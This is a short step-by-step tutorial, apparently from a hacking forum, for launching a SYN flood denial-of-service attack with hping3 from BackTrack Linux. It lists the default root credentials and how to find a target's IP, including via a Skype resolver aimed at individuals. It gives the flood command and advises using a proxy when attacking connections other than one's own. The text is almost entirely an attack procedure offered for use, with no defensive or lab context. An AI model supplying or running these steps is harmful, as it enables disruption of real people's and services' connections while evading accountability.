1. Start up backtrack through Vmware or another virtual machine runner.
2. Start it up like usual, default user and pw: root toor How to start: startx
3. Open up terminal Applications>Accessories>Terminal
4. Enter apt-get install hping3 <<Only if you don't have it, backtrack should have it automatically installed.
5. Find your target using the cmd command tracert google.com or using the free skype resolver below.
6. Type in hping3 --flood -S (IP HERE)
Make sure if you're not testing this on your own connection to be using a proxy.
